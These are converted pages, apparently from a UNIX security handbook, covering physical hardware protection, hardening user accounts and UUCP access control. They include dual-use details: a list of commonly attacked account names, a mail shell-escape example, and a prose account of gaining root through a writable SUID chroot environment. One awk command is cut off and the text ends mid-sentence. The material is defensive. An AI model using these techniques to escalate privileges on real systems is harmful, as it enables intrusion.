[Chapter 12] 12.2 Protecting Computer Hardware<br />

Computers that have ventilation holes need them. Don't seal up the holes to prevent this sort of<br />

vandalism. However, a rigidly enforced policy against food and drink in the computer room - or a<br />

24-hour guard - can help prevent this kind of incident from happening at your site.<br />

12.2.4.2 Network cables<br />

Local and wide area networks are exceedingly vulnerable to vandalism. In many cases, a vandal can<br />

disable an entire subnet of workstations by cutting a single wire with a pair of wire cutters. Compared<br />

with Ethernet, fiber optic cables are at the same time more vulnerable (because sometimes they can be<br />

more easily damaged), more difficult to repair (because fiber optics are difficult to splice), and more<br />

attractive targets (because they often carry more information).<br />

One simple method for protecting a network cable is to run it through physically secure locations. For<br />

example, Ethernet cable is often placed in cable trays or suspended from ceilings with plastic loops. But<br />

Ethernet can also be run through steel conduit between offices. Besides protecting against vandalism, this<br />

practice protects against some forms of network eavesdropping, and may help protect your cables in the<br />

event of a small fire.<br />

Some high-security installations use double-walled, shielded conduit with a pressurized gas between the<br />

layers. Pressure sensors on the conduit break off all traffic or sound a warning bell if the pressure ever<br />

drops, as might occur if someone breached the walls of the pipe. It important that you physically protect<br />

your network cables. Placing the wire inside an electrical conduit when it is first installed can literally<br />

save thousands of dollars in repairs and hundreds of hours in downtime later.<br />

Many universities have networks that rely on Ethernet or fiber optic cables strung through the basements.<br />

A single frustrated student with a pair of wirecutters or a straight pin can halt the work of thousands of<br />

students and professors.<br />

We also have heard stories about fiber optic cable suffering small fractures because someone stepped on<br />

it. A fracture of this type is difficult to locate because there is no break in the coating. Be very careful<br />

where you place your cables. Note that "temporary" cable runs often turn into permanent or<br />

semi-permanent installations, so take the extra time and effort to install cable correctly the first time.<br />

12.2.4.3 Network connectors<br />

In addition to cutting a cable, a vandal who has access to a network's endpoint - a network connector -<br />

can electronically disable or damage the network. Ethernet is especially vulnerable to grounding and<br />

network-termination problems. Simply by removing a terminator at the end of the network cable or by<br />

grounding an Ethernet's inside conductor, an attacker can render the entire network inoperable. Usually<br />

this event happens by accident; however, it can also happen as the result of an intentionally destructive<br />

attack.<br />

All networks based on wire are vulnerable to attacks with high voltage. At one university in the late<br />

1980s, a student destroyed a cluster of workstations by plugging the thin-wire Ethernet cable into a<br />

110VAC wall outlet. (Once again, the student wanted to simulate a lightning strike because he hadn't<br />

done his homework.)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (11 of 14) [2002-04-12 10:44:23]


[Chapter 12] 12.2 Protecting Computer Hardware<br />

12.2.5 Defending Against Acts of War and Terrorism<br />

Unless your computer is used by the military or being operated in a war zone, it is unlikely to be a war<br />

target. Nevertheless, if you live in a region that is subject to political strife, you may wish to consider<br />

additional structural protection for your computer room.<br />

Alternatively, you may find it cheaper to devise a system of hot backups and mirrored disks and servers.<br />

With a reasonably fast network link, you can arrange for files stored on one computer to be<br />

simultaneously copied to another system on the other side of town - or the other side of the world. Sites<br />

that cannot afford simultaneous backup can have hourly or nightly incremental dumps made across the<br />

network link. Although a tank or suicide bomber may destroy your computer center, your data can be<br />

safely protected someplace else.<br />

12.2.6 Preventing Theft<br />

Because many computers are relatively small and valuable, they are easily stolen and easily sold. Even<br />

computers that are relatively difficult to fence - such as DEC VaxStations - have been stolen by thieves<br />

who thought that they were actually stealing PCs. As with any expensive piece of equipment, you should<br />

attempt to protect your computer investment with physical measures such as locks and bolts.<br />

RAM Theft<br />

Figure 12.1: SIMMs (standard inline memory modules) are vulnerable to theft<br />

In recent years, businesses and universities have suffered a rash of RAM thefts. Thieves enter offices,<br />

open computers, and remove some or all of the computer's RAM. Many computer businesses and<br />

universities have also had major thefts of advanced processor chips.<br />

RAM and late-model CPU chips are easily sold on the open market. They are untraceable. And, when<br />

thieves steal only some of the RAM inside a computer, many weeks or months may pass before the theft<br />

is noticed.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (12 of 14) [2002-04-12 10:44:23]


[Chapter 12] 12.2 Protecting Computer Hardware<br />

Remember, high-density RAM modules and processor cards are worth substantially more than their<br />

weight in gold. If a user complains that a computer is suddenly running more slowly than it did the day<br />

before, check its RAM, and then check to see that its case is physically secured.<br />

12.2.6.1 Physically secure your computer<br />

A variety of physical tie-down devices are available to bolt computers to tables or cabinets. Although<br />

they cannot prevent theft, they can make theft more difficult.<br />

12.2.6.2 Encryption<br />

If your computer is stolen, the information it contains will be at the mercy of the equipment's new<br />

"owners." They may erase it. Alternatively, they may read it. Sensitive information can be sold, used for<br />

blackmail, or used to compromise other computer systems.<br />

You can never make something impossible to steal. But you can make stolen information virtually<br />

useless - provided that it is encrypted and that the thief does not know the encryption key. For this<br />

reason, even with the best computer-security mechanisms and physical deterrents, sensitive information<br />

should be encrypted using an encryption system that is difficult to break.[5] We recommend that you<br />

acquire and use a strong encryption system so that even if your computer is stolen, the sensitive<br />

information it contains will not be compromised.<br />

[5] The <strong>UNIX</strong> crypt encryption program (described in Chapter 6, Cryptography) is trivial to<br />

break. Do not use it for information that is the least bit sensitive.<br />

12.2.6.3 Portables<br />

Portable computers present a special hazard. They are easily stolen, difficult to tie down (they then cease<br />

to be portable!), and often quite easily resold. Personnel with laptops should be trained to be especially<br />

vigilant in protecting their computers. In particular, theft of laptops in airports is a major problem.<br />

Note that theft of laptops may not be motivated by greed (resale potential) alone. Often, competitive<br />

intelligence is more easily obtained by stealing a laptop with critical information than by hacking into a<br />

protected network. Thus, good encryption on a portable computer is critical. Unfortunately, this<br />

encryption makes the laptop a "munition" and difficult to legally remove from many countries (including<br />

the U.S.).[6]<br />

[6] See Chapter 6 for more detail on this.<br />

Different countries have different laws with respect to encryption, and many of these laws are currently<br />

in flux. In the United States, you cannot legally export computers containing cryptographic software: one<br />

solution to this problem is to use an encryption product that is manufactured and marketed outside, as<br />

well as inside, your country of origin. First encrypt the data before leaving, then remove the encryption<br />

software. After you arrive at your destination, obtain a copy of the same encryption software and reinstall<br />

it. (For the U.S. at least, you can legally bring the PC back into the country with the software in place.)<br />

But U.S. regulations currently have exemptions allowing U.S.-owned companies to transfer<br />

cryptographic software between their domestic and foreign offices. Furthermore, destination countries<br />

may have their own restrictions. Frankly, you may prefer to leave the portable at home!<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (13 of 14) [2002-04-12 10:44:23]


[Chapter 12] 12.2 Protecting Computer Hardware<br />

12.2.6.4 Minimizing downtime<br />

We hope your computer will never be stolen or damaged. But if it is, you should have a plan for<br />

immediately securing temporary computer equipment and for loading your backups onto the new<br />

systems. This plan is known as disaster recovery.<br />

We recommend that you do the following:<br />

●<br />

●<br />

Establish a plan for rapidly acquiring new equipment in the event of theft, fire, or equipment<br />

failure.<br />

Test this plan by renting (or borrowing) a computer system and trying to restore your backups.<br />

If you ask, you may discover that your computer dealer is willing to lend you a system that is faster than<br />

the original system, for the purpose of evaluation. There is probably no better way to evaluate a system<br />

than to load your backup tapes onto the system and see if they work. Be sure to delete and purge the<br />

computer's disk drives before returning them to your vendor.<br />

12.2.7 Related Concerns<br />

Beyond the items mentioned earlier, you may also wish to consider the impact on your computer center<br />

of the following:<br />

●<br />

●<br />

●<br />

●<br />

Loss of phone service or networks. How will this impact your regular operations?<br />

Vendor going bankrupt. How important is support? Can you move to another hardware or software<br />

system?<br />

Significant absenteeism. Will this impact your ability to operate?<br />

Death or incapacitation of key personnel. Can every member of your computer organization be<br />

replaced? What are the contingency plans?<br />

12.1 One Forgotten Threat 12.3 Protecting Data<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch12_02.htm (14 of 14) [2002-04-12 10:44:23]


[Chapter 8] Defending Your Accounts<br />

Chapter 8<br />

8. Defending Your Accounts<br />

Contents:<br />

Dangerous Accounts<br />

Monitoring File Format<br />

Restricting Logins<br />

Managing Dormant Accounts<br />

Protecting the root Account<br />

The <strong>UNIX</strong> Encrypted Password System<br />

One-Time Passwords<br />

Administrative Techniques for Conventional Passwords<br />

An ounce of prevention . . .<br />

The worst time to think about how to protect your computer and its data from intruders is after a break-in. At<br />

that point, the damage has already been done, and determining where and to what extent your system has been<br />

hurt can be difficult.<br />

Did the intruder modify any system programs? Did the intruder create any new accounts, or change the<br />

passwords of any of your users? If you haven't prepared in advance, you could have no way of knowing the<br />

answers.<br />

This chapter describes the ways in which an attacker can gain entry to your system through accounts that are<br />

already in place, and the ways in which you can make these accounts more difficult to attack.<br />

8.1 Dangerous Accounts<br />

Every account on your computer is a door to the outside, a portal through which both authorized and<br />

unauthorized users can enter. Some of the portals are well defended, while others may not be. The system<br />

administrator should search for weak points and seal them up.<br />

8.1.1 Accounts Without Passwords<br />

Like the lock or guard on the front door of a building, the password on each one of your computer's accounts is<br />

your system's first line of defense. An account without a password is a door without a lock. Anybody who<br />

finds that door - anybody who knows the name of the account - can enter.<br />

Many so-called "computer crackers" succeed only because they are good at finding accounts without<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_01.htm (1 of 9) [2002-04-12 10:44:24]


[Chapter 8] Defending Your Accounts<br />

passwords or accounts that have passwords that are easy to guess.<br />

On SVR4 versions of <strong>UNIX</strong>, you can scan for accounts without passwords by using the logins command:<br />

# logins -p<br />

You can also scan for accounts without passwords by using the command:<br />

% cat-passwd | awk -F: 'length($2)


[Chapter 8] Defending Your Accounts<br />

demonstrations easier to run. Remember to remove these accounts when the computer is returned. (Even<br />

better: erase the hard disk and reinstall the operating system. You never know what a computer might bring<br />

back from a trade show.)<br />

Table 8.1 is a list of accounts that are commonly attacked. If you have any of these accounts, make sure that<br />

they are protected with strong passwords or that they are set up so they can do no damage if penetrated (see the<br />

sections below entitled "Accounts That Run a Single Command" and "Open Accounts").<br />

Table 8.1: Account<br />

Names Commonly<br />

Attacked on <strong>UNIX</strong><br />

Systems<br />

open help games<br />

guest demo maint<br />

mail finger uucp<br />

bin toor system<br />

who ingres lp<br />

nuucp visitor<br />

manager telnet<br />

8.1.3 Accounts That Run a Single Command<br />

<strong>UNIX</strong> allows the system administrator to create accounts that simply run a single command or application<br />

program (rather than a shell) when a user logs into them. Often these accounts do not have passwords.<br />

Examples of such accounts include date, uptime, sync, and finger as shown below:<br />

date::60000:100:Run the date program:/tmp:/sbin/date<br />

uptime::60001:100:Run the uptime program:/tmp:/usr/ucb/uptime<br />

finger::60002:100:Run the finger program:/tmp:/usr/ucb/finger<br />

sync::60003:100:Run the sync program:/tmp:/sbin/sync<br />

If you have these accounts installed on your computer, someone can use them to find out the time or to<br />

determine who's logged into your computer simply by typing the name of the command at the login: prompt.<br />

For example:<br />

login: uptime<br />

Last login: Tue Jul 31 07:43:10 on ttya<br />

Whammix V 17.1 ready to go!<br />

9:44am up 7 days, 13:09, 4 users, load average: 0.92, 1.34, 1.51<br />

login:<br />

If you decide to set up an account of this type, you should be sure that the command it runs takes no keyboard<br />

input and can in no way be coerced into giving the user an interactive process. Specifically, these programs<br />

should not have shell escapes. Letting a user run the Berkeley mail program without logging in is dangerous,<br />

because the mail program allows the user to run any command by preceding a line of the mail message with a<br />

tilde and an exclamation mark.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_01.htm (3 of 9) [2002-04-12 10:44:24]


[Chapter 8] Defending Your Accounts<br />

% mail Sarah<br />

Subject: test message<br />

~!date<br />

Wed Aug 1 09:56:42 EDT 1990<br />

Allowing programs like who and finger to be run by someone who hasn't logged in is also a security risk,<br />

because these commands let people learn the names of accounts on your computer. Such information can be<br />

used as the basis for further attacks against your computer system.<br />

NOTE: If you must have accounts that run a single command, do not have those accounts run<br />

with the UID of 0 (root) or of any other privileged user (such as bin, system, daemon, etc.)<br />

8.1.4 Open Accounts<br />

Many computer centers provide accounts on which visitors can play games while they are waiting for an<br />

appointment, or allow visitors to use a modem or network connection to contact their own computer systems.<br />

Typically these accounts have names like open, guest, or play. They usually do not require passwords.<br />

Because the names and passwords of open accounts are often widely known and easily guessed, they are<br />

security breaches waiting to happen. An intruder can use an open account to gain initial access to your<br />

machine, and then use that access to probe for greater security lapses on the inside. At the very least, an<br />

intruder who is breaking into other sites might direct calls through the guest account on your machine, making<br />

their calls difficult or even impossible to trace.<br />

Providing open accounts in your system is a very bad idea. If you must have them, for whatever reason,<br />

generate a new, random password daily for your visitors to use. Don't allow the password to be sent via<br />

electronic mail or given to anyone who doesn't need it for that day.<br />

8.1.4.1 Restricted shells under System V <strong>UNIX</strong><br />

The System V <strong>UNIX</strong> shell can be invoked to operate in a restricted mode that can be used to minimize the<br />

dangers of an open account. This mode occurs when the shell is invoked with a -r command-line option, or<br />

with the command named rsh (restricted shell)[1] - usually as a link to the standard shell. When rsh starts up, it<br />

executes the commands in the file $HOME/.profile. Once the .profile is processed, the following restrictions<br />

go into effect:<br />

●<br />

●<br />

●<br />

●<br />

[1] Not to be confused with rsh, the network remote-shell command. This conflict is unfortunate.<br />

The user can't change the current directory.<br />

The user can't change the value of the PATH environment variable.<br />

The user can't use command names containing slashes.<br />

The user can't redirect output with > or >>.<br />

As an added security measure, if the user tries to interrupt rsh while it is processing the $HOME/.profile file,<br />

rsh immediately exits.<br />

The net effect of these restrictions is to prevent the user from running any command that is not in a directory<br />

contained in the PATH environment variable, to prevent the user from changing his or her PATH, and to<br />

prevent the user from changing the .profile of the restricted account that sets the PATH variable in the first<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_01.htm (4 of 9) [2002-04-12 10:44:24]


[Chapter 8] Defending Your Accounts<br />

place.<br />

You can further modify the .profile file to prevent the restricted account from being used over the network.<br />

You do this by having the shell script use the tty command to make sure that the user is attached to a physical<br />

terminal and not a network port.<br />

Be aware that rsh is not a panacea. If the user is able to run another shell, such as sh or csh, the user will have<br />

the same access to your computer that he or she would have if the account was not restricted at all. Likewise, if<br />

the user can run a program that supports shell escapes, such as mail, the account is unrestricted (see below).<br />

8.1.4.2 Restricted shells under Berkeley versions<br />

Under Berkeley-derived <strong>UNIX</strong>, you can create a restricted shell by creating a hard link to the sh program and<br />

giving it the name rsh. When sh starts up, it looks at the program name under which it was invoked to<br />

determine what behavior it should have:<br />

% ln /bin/sh /usr/etc/rsh<br />

This restricted shell functions in the same manner as the System V rsh described above.<br />

Note that a hard link will fail if the destination is on a different partition. If you need to put rsh and sh on<br />

different partition, try a symbolic link, which works on most systems. If it does not, or if your system does not<br />

support symbolic links, then consider copying the shell to the destination partition, rather than linking it.<br />

You should be careful not to place this restricted shell in any of the standard system program directories, so<br />

that people don't accidentally execute it when they are trying to run the rsh remote shell program.<br />

8.1.4.3 Restricted Korn shell<br />

The Korn shell (ksh) can be configured to operate in a restricted mode as well, and be named rksh or krsh so as<br />

not to conflict with the network remote shell rsh. If ksh is invoked with the -r command-line option, or is<br />

started as rsh, it also executes in restricted mode. When in restricted mode, the Korn shell behaves as the<br />

System V restricted shell, except that additionally the user cannot modify the ENV or SHELL variables, nor<br />

can the user change the primary group using the newgrp command.<br />

8.1.4.4 No restricted bash<br />

The ( bsh) shell from the Free Software Foundation does not have a restricted mode.<br />

8.1.4.5 How to set up a restricted account with rsh<br />

To set up a restricted account that uses rsh, you must:<br />

●<br />

●<br />

Create a special directory containing only the programs that the restricted shell can run.<br />

Create a special user account that has the restricted shell as its login shell.<br />

NOTE: The setup we show in the following example is not entirely safe, as we explain later in<br />

this chapter.<br />

For example, to set up a restricted shell that lets guests play rogue and hack, and use the talk program, first<br />

create a user called player that has /bin/rsh as its shell and /usr/rsh/home as its home directory:<br />

player::100:100:The Games Guest user:/usr/rshhome:/bin/rsh<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_01.htm (5 of 9) [2002-04-12 10:44:24]


[Chapter 8] Defending Your Accounts<br />

Next, create a directory for only the programs you want the guest to use, and fill the directory with the<br />

appropriate links:<br />

# mkdir /usr/rshhome /usr/rshhome/bin<br />

# ln /usr/games/hack /usr/rshhome/bin/hack<br />

# ln /usr/games/rogue /usr/rshhome/bin/rogue<br />

# ln /usr/bin/talk /usr/rshhome/bin/talk<br />

# chmod 555 /usr/rshhome/bin<br />

# chmod 555 /usr/rshhome<br />

Finally, create a .profile for the player user that sets the PATH environment variable and prints some<br />

instructions:<br />

# cat > /usr/rshhome/.profile<br />

/bin/echo This guest account is only for the use of authorized guests.<br />

/bin/echo You can run the following programs:<br />

/bin/echo rogue A role playing game<br />

/bin/echo hack A better role playing game<br />

/bin/echo talk A program to talk with other people.<br />

/bin/echo<br />

/bin/echo Type "logout" to log out.<br />

PATH=/usr/rshhome/bin<br />

SHELL=/bin/rsh<br />

export PATH SHELL<br />

^D<br />

# chmod 444 /usr/rshhome/.profile<br />

# chown player /usr/rshhome/.profile<br />

# chmod 500 /usr/rshhome<br />

8.1.4.6 Potential problems with rsh<br />

Be especially careful when you use rsh, because many <strong>UNIX</strong> commands allow shell escapes, or means of<br />

executing arbitrary commands or subshells from within themselves. Many programs that have shell escapes do<br />

not document this feature; several popular games fall into this category. If a program that can be run by a<br />

"restricted" account has the ability to run subprograms, then the account may not be restricted at all. For<br />

example, if the restricted account can use man to read reference pages, then a person using the restricted<br />

account can use man to start up an editor, then spawn a shell, and then run programs on the system.<br />

For instance, in our above example, all of the commands linked into the restricted bin will spawn a subshell<br />

when presented with the appropriate input. Thus, although the account appears to be restricted, it will actually<br />

only slow down users who don't know about shell escapes.<br />

8.1.5 Restricted Filesystem<br />

Another way to restrict some users on your system is to put them into a restricted filesystem. You can<br />

construct an environment where they have limited access to commands and files, but can still have access to a<br />

regular shell (or a restricted shell if you prefer). The way to do this is with the chroot () system call. chroot ()<br />

changes a process's view of the filesystem such that the apparent root directory is not the real filesystem root<br />

directory, but one of its descendents.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_01.htm (6 of 9) [2002-04-12 10:44:24]


[Chapter 8] Defending Your Accounts<br />

SVR4 has a feature to do this change automatically. If the shell field (field 7) for a user in the /etc/passwd file<br />

is a "*" symbol, then the login program will make a chroot () call on the home directory field (field 6) listed in<br />

the entry. It will then reexecute the login program - only this time, it will be the login program in the reduced<br />

filesystem, and will be using the new passwd file found there (one that has a real shell listed, we would<br />

expect). If you do not have this feature in your version of <strong>UNIX</strong>, you can easily write a small program to do so<br />

(it will need to be SUID root for the chroot() call to function), and place the program's pathname in the shell<br />

field instead of one of the shells.<br />

The restricted filesystem so named must have all the necessary files and commands for the login program to<br />

run and to execute programs (including shared libraries). Thus, the reduced filesystem needs to have an /etc<br />

directory, a /lib and /usr/lib directory, and a /bin directory. However, these directories do not need to contain<br />

all of the files and programs in the standard directories. Instead, you can copy or link only those files necessary<br />

for the user.[2] Remember to avoid symbolic links reaching out of the restricted area, because the associated<br />

directories will not be visible. Using loopback mounts of the filesystem in read-only mode is one good way to<br />

populate these limited filesystems as it also protects the files from modification. Figure 1.1 shows how the<br />

restricted filesystem is part of the regular filesystem.<br />

[2] This may take some experimentation on your part to get the correct setup of files.<br />

Figure 8.1: Example of restricted filesystem<br />

There are at least two good uses for such an environment.<br />

8.1.5.1 Limited users<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_01.htm (7 of 9) [2002-04-12 10:44:24]


[Chapter 8] Defending Your Accounts<br />

You may have occasion to give access to some users for a set of limited tasks. For instance, you may have an<br />

online company directory and an order-tracking front end to a customer database, and you might like to make<br />

these available to your customer service personnel. There is no need to make all of your files and commands<br />

accessible to these users. Instead, you can set up a minimal account structure so that they can log in, use<br />

standard programs that you provide, and have the necessary access. At the same time, you have put another<br />

layer of protection between your general system and the outside: if intruders manage to break the password of<br />

one of these users and enter the accounts, they will not have access to the real /etc/passwd (to download and<br />

crack), nor will they have access to network commands to copy files in or out, nor will they be able to compile<br />

new programs to do the same.<br />

8.1.5.2 Checking new software<br />

Another use of a restricted environment is to test new software of perhaps questionable origin. In this case, you<br />

configure an environment for testing, and enter it with either the chroot () system command or with a program<br />

that executes chroot() on your behalf. Then, when you test the software you have obtained, or unpack an<br />

archive, or perform any other possibly risky operation, the only files you will affect are the ones you put in the<br />

restricted environment - not everything in the whole filesystem!<br />

NOTE: Be very, very careful about creating any SUID programs that make a chroot() call. If any<br />

user can write to the directory to which the program chroot's, or if the user can specify the<br />

directory to which the chroot() occurs, the user could become a superuser on your system. To do<br />

this, he need only change the password file in the restricted environment to give himself the<br />

ability to su to root, change to the restricted environment, create a SUID root shell, and then log<br />

back in as the regular user to execute the SUID shell.<br />

8.1.6 Group Accounts<br />

A group account is an account that is used by more than one person. Group accounts are often created to allow<br />

a group of people to work on the same project without requiring that an account be built for each person. Other<br />

times, group accounts are created when several different people have to use the same computer for a short<br />

period of time. In many introductory computer courses, for example, there is a group account created for the<br />

course; different students store their files in different subdirectories or on floppy disks.<br />

Group accounts are always a bad idea, because they eliminate accountability. If you discover that an account<br />

shared by 50 people has been used to break into computers across the United States, tracking down the<br />

individual responsible will be nearly impossible. Furthermore, a person is far more likely to disclose the<br />

password for a group account than he is to release the password for an account to which he alone has access.<br />

An account that is officially used by 50 people may in fact be used by 150; you have no way of knowing.<br />

Instead of creating group accounts, create an account for each person in the group. If the individuals are all<br />

working on the same project, create a new <strong>UNIX</strong> group in the file /etc/group, and make every user who is<br />

affiliated with the project part of the group. This method has the added advantage of allowing each user to<br />

have his own start-up and dot files.<br />

For example, to create a group called spistol with the users sid, john, and nancy in it, you might create the<br />

following entry in /etc/group:<br />

spistol:*:201:sid,john,nancy<br />

Then be sure that Sid, John, and Nancy understand how to set permissions and use necessary commands to<br />

work with the group account. In particular, they should set their umask to 002 or 007 while working on the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_01.htm (8 of 9) [2002-04-12 10:44:24]


[Chapter 8] Defending Your Accounts<br />

group project.<br />

NOTE: Some versions of <strong>UNIX</strong> limit the number of characters that can be specified in a single<br />

line. If you discover that you cannot place more than a certain number of users in a particular<br />

group, the above restriction might be the cause of your problem. In such a case, you may wish to<br />

place each user in the group by specifying the group in the user's /etc/passwd entry. Or, you may<br />

wish to move to a network configuration-management system, such as NIS+ or DCE, which is<br />

less likely to have such limitations.<br />

7.4 Software for Backups 8.2 Monitoring File Format<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch08_01.htm (9 of 9) [2002-04-12 10:44:24]


[Chapter 15] 15.4 <strong>Sec</strong>urity in Version 2 UUCP<br />

Chapter 15<br />

UUCP<br />

15.4 <strong>Sec</strong>urity in Version 2 UUCP<br />

Version 2 of UUCP provides five files that control what type of access remote systems are allowed on<br />

your computer (see Table 15.1).<br />

Table 15.1: UUCP Version 2 Access Control Files<br />

File Meaning<br />

USERFILE Determines access to files and directories.<br />

L.cmds Specifies commands that can be executed locally by remote sites.<br />

SEQFILE Specifies machines for which to keep conversation counts.<br />

FWDFILE Specifies a list of systems to which your system will forward files. (Not available in all<br />

implementations.)<br />

ORGFILE Specifies a list of systems (and optionally, users on those systems) who can forward files<br />

through your system. (Not available in all implementations.)<br />

The two files of primary concern are USERFILE and L.cmds; for a detailed description of the other files,<br />

please see the book Managing UUCP and Usenet referenced above.<br />

15.4.1 USERFILE: Providing Remote File Access<br />

The /usr/lib/uucp/USERFILE file controls which files on your computer can be accessed through the<br />

UUCP system. Normally, you specify one entry in USERFILE for each UUCP login in the /etc/passwd<br />

file. You can also include entries in USERFILE for particular users on your computer: this allows you to<br />

give individual users additional UUCP privileges.<br />

USERFILE entries can specify four things:<br />

●<br />

●<br />

●<br />

●<br />

Which directories can be accessed by remote systems<br />

The login name that a remote system must use to talk to the local system<br />

Whether a remote system must be called back by the local system to confirm its identity before<br />

communication can take place<br />

Which files can be sent out over UUCP by local users<br />

15.4.1.1 USERFILE entries<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_04.htm (1 of 7) [2002-04-12 10:44:25]


[Chapter 15] 15.4 <strong>Sec</strong>urity in Version 2 UUCP<br />

USERFILE is one of the more complicated parts of Version 2 UUCP. In some cases, making a mistake<br />

with USERFILE can prevent UUCP from working at all. In other cases, it can result in a security hole.<br />

Entries in USERFILE take the form:<br />

username,system-name [c] pathname(s)<br />

An entry in USERFILE that uses all four fields might look like this:<br />

Ugarp,garp c /usr/spool/uucppublic<br />

These fields are described in Table 15.2.<br />

Table 15.2: USERFILE Fields<br />

Field Example Function in USERFILE<br />

username Ugarp Login name in /etc/passwd that will be used<br />

system name garp System name of the remote system.<br />

c c Optional callback flag. If present, uucico on the local computer halts<br />

conversation after the remote machine calls the local machine;<br />

uucico on the local machine then calls back the remote machine to<br />

establish the remote machine's identity<br />

pathname /usr/spool/uucppublic List of absolute pathname prefixes separated by blanks. The remote<br />

system can access only those files beginning with these pathnames.<br />

A blank field indicates open access to any file in the system, as does<br />

a pathname of /.<br />

You should have at least one entry in USERFILE without a username field, and at least one other entry<br />

without a system name field:<br />

●<br />

●<br />

The line that has no username field is used by uucico when it is transmitting files, to determine if it<br />

is allowed to transmit the file that you have asked to transmit.<br />

The line that has no system name field is used by uucico when it is receiving files and cannot find<br />

a name in the USERFILE that has a system name matching the current system. uucico uses this<br />

line to see if it is allowed to place a file in the requested directory. This line is also used by the<br />

uuxqt program.<br />

To make things more interesting, almost every implementation of UUCP parses USERFILE a little<br />

differently. The key rules that apply to all versions are:<br />

●<br />

●<br />

●<br />

When uucp and uux are run by users, and when uucico runs in the Master role (a connection<br />

originating from your local machine), UUCP uses only the username part of the username and<br />

system name fields.<br />

When uucico runs in the Slave role, UUCP looks only at the system name field.<br />

There must be at least one line that has an empty system name, and one line that has an empty<br />

username. (In most BSD-derived systems, they can be the same line. Every other implementation<br />

requires two separate lines. You are safest in using two lines if you don't understand what your<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_04.htm (2 of 7) [2002-04-12 10:44:25]


[Chapter 15] 15.4 <strong>Sec</strong>urity in Version 2 UUCP<br />

version allows.) The locations of these lines in the file is not important, but both lines must be<br />

present.<br />

15.4.1.2 USERFILE entries for local users<br />

You can have an entry in your USERFILE for every user who will be allowed to transfer files. For<br />

example, the following entries give the local users lance and annalisa permission to transfer a file in or<br />

out of any directory on your computer to which they have access:<br />

lance, /<br />

annalisa, /<br />

This USERFILE entry gives the local user casper permission to transfer files in or out of the UUCP<br />

public directory or the directory /usr/ghost:<br />

casper, /usr/spool/uucppublic /usr/ghost<br />

Be aware that USERFILE allows a maximum of 20 entries in Version 7 and System V Release 1.0.<br />

Instead of specifying a USERFILE entry for each user on your system, you can specify a USERFILE<br />

entry without a username. This default entry covers all users on your system that are not otherwise<br />

specified. To give all users access to the UUCP public directory, you might use the following USERFILE<br />

entry:<br />

,localhost /usr/spool/uucppublic<br />

(The hostname localhost is ignored by the UUCP software and is included only for clarity.)<br />

15.4.1.3 Format of USERFILE entry without system name<br />

To allow file transfer from other systems to your system, and to allow files to be accessed by uuxqt (even<br />

when it is started from your system), you must have at least one entry in USERFILE for which the system<br />

name is not specified. For example:<br />

nuucp, /usr/spool/uucppublic<br />

Although you might expect that this line would mean that any system logging in with the name nuucp<br />

would have access to /usr/spool/uucppublic, such is not the case for all versions of UUCP.<br />

In System V Release 2.0 and in Ultrix, UUCP will actually check both the username field and the blank<br />

system name field, and will allow logins by any system using nuucp.<br />

In other UUCP implementations, however, the fact that nuucp appears on this line is completely<br />

irrelevant to a system calling in. The system name is used only to validate file transfers for files that are<br />

received by your system. If this is the first entry with a missing system name, UUCP will actually allow<br />

access to uucppublic by any system for which there is no explicit USERFILE entry containing that<br />

system's system name. If this is not the first entry with a blank system name, it will have no effect.<br />

15.4.1.4 Special permissions<br />

You may wish to make special directories on your system available to particular users on your system or<br />

to particular systems with which you communicate. For example:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_04.htm (3 of 7) [2002-04-12 10:44:25]


[Chapter 15] 15.4 <strong>Sec</strong>urity in Version 2 UUCP<br />

Ugarp,garp /usr/spool/uucppublic /usr/spool/news<br />

This line will make both the directories /usr/spool/uucppublic and /usr/spool/news available to the<br />

system name garp when you call it, and to any system that logs in with the UUCP login Ugarp. You<br />

might want to add this line if you anticipate transferring news articles between your computer and garp<br />

directly, without going through the Usenet news software.<br />

15.4.1.5 Requiring callback<br />

Version 2 UUCP has a callback feature that you can use if you are extremely concerned about security.<br />

With callback, when a remote system calls your computer, your system immediately hangs up on the<br />

remote system and calls it back. In this way, you can be sure that the remote system is who it claims to<br />

be.<br />

If you put a c as the first entry in the USERFILE path list, no files will be transferred when the remote<br />

system's uucico logs in. Instead, your system will call back the remote system. No special callback<br />

hardware is required to take advantage of UUCP callback, because it is performed by the system<br />

software, not by the modem.<br />

For example, here is garp's USERFILE entry modified so the local system will always call garpback<br />

whenever garp calls the local system:<br />

Ugarp,garp c /usr/spool/uucppublic /usr/spool/news<br />

Callback adds to the security of UUCP. Normally there is no way to be sure that a computer calling up<br />

and claiming to be garp, for example, is really garp. It might be another system that belongs to a<br />

computer cracker who has learned garp's UUCP login and password. If you call back the remote system,<br />

however, you can be reasonably sure that you are connecting to the right system.<br />

NOTE: Only one system out of each pair of communicating systems can have a c in its<br />

USERFILE to enable the callback feature. If both ends of a connection enable callback, they<br />

